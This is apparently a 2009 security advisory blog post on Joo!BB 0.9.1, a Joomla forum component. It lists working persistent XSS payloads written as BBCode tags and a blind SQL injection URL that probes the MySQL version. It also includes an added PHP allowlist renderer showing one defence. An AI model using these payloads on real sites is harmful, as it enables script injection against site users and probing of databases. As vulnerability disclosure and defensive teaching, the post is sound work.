jeffchannell.com

Joo!BB 0.9.1 Multiple Vulnerabilities

Posted in Joomla!
2009-08-01 05:00:00 +0000 UTC

The Joomla component Joo!BB 0.9.1 suffers from multiple persistent XSS vulnerabilities in its BBCode implementation, as well as Blind SQL Injection in its search feature.

  1. Nested [img] XSS

    [img]http://foo.com/fake.png [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]
  2. Nested [url] XSS

    [url]http://google.com?[url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url]
  3. BBCode [color] Tag Injection

    [color=#ff0000;font-size:100px;]XSS[/color]
  4. BBCode [url] Location XSS

    [url=javascript:alert(String.fromCharCode(88,83,83))]http://google.com[/url]
  5. BBCode [font] Tag Injection

    [font=Impact, Compacta, Chicago, sans-serif;color:red;]XSS[/font]
  6. BBCode [table] Tag XSS

    [table=border='1' cellspacing='0' cellpadding='0' width='100%'][tr=bgcolor='#ffffff'][td=width='*' onclick='javascript:alert(String.fromCharCode(88,83,83))']XSS[/td][/tr][/table]
  7. Blind SQL Injection

    /index.php?tmpl=component&option=com_joobb&view=search&searchwords=%' and SUBSTRING(@@version,1,1)=5 -- '

    If MySQL is version 5, this request returns results; otherwise it returns none.

These vulnerabilities have been patched, and users are strongly urged to update to 0.9.1 Patch 1.
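
Items 3 to 5 all work by placing extra characters in a BBCode tag argument. As an added example (not Joo!BB's code and not the Patch 1 fix), the PHP sketch below escapes the post first and emits HTML for a tag only when its argument passes an allowlist. The names `bb_safe_color`, `bb_safe_font`, `bb_safe_url` and `bb_render` are hypothetical, and only the `[tag=arg]` forms of `color`, `font` and `url` are handled.

```php
<?php
// Added example: hypothetical allowlist renderer, not Joo!BB code.

function bb_safe_color(string $v): ?string {
    // Only #rgb, #rrggbb or a bare color name; no ';' or ':' can pass.
    return preg_match('/\A(#[0-9a-f]{3}|#[0-9a-f]{6}|[a-z]{1,20})\z/i', $v) ? $v : null;
}

function bb_safe_font(string $v): ?string {
    // Font names separated by commas; no ';', ':' or quotes can pass.
    return preg_match('/\A[a-z0-9 ,\-]{1,100}\z/i', $v) ? $v : null;
}

function bb_safe_url(string $v): ?string {
    // Scheme allowlist: anything that is not http(s), such as javascript:, fails.
    return preg_match('#\Ahttps?://[^\s"\'<>\[\]]+\z#i', $v) ? $v : null;
}

function bb_render(string $text): string {
    // Escape first, so user-supplied quotes and angle brackets are inert.
    $out = htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
    $rules = [
        'color' => ['bb_safe_color', '<span style="color:%s">%s</span>'],
        'font'  => ['bb_safe_font', '<span style="font-family:%s">%s</span>'],
        'url'   => ['bb_safe_url', '<a href="%s" rel="nofollow">%s</a>'],
    ];
    foreach ($rules as $tag => [$check, $html]) {
        $out = preg_replace_callback(
            '#\[' . $tag . '=([^\]]*)\](.*?)\[/' . $tag . '\]#is',
            function (array $m) use ($check, $html): string {
                $arg = $check($m[1]);
                // Rejected argument: keep the escaped BBCode as plain text.
                return $arg === null ? $m[0] : sprintf($html, $arg, $m[2]);
            },
            $out
        ) ?? $out; // on a PCRE error, keep the escaped text unchanged
    }
    return $out;
}

// Inputs: items 3 to 5 from the list above, plus one constructed benign post.
$samples = [
    '[color=#ff0000;font-size:100px;]XSS[/color]',
    '[url=javascript:alert(String.fromCharCode(88,83,83))]http://google.com[/url]',
    '[font=Impact, Compacta, Chicago, sans-serif;color:red;]XSS[/font]',
    '[color=#ff0000]ok[/color] [url=http://example.com/?a=1&b=2]link[/url]',
];
foreach ($samples as $s) {
    echo bb_render($s), PHP_EOL;
}
```

Because every value that reaches an attribute has passed a pattern that excludes `[`, `]`, quotes and whitespace-separated attributes, a later rule cannot start matching inside an attribute emitted by an earlier one.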

Timeline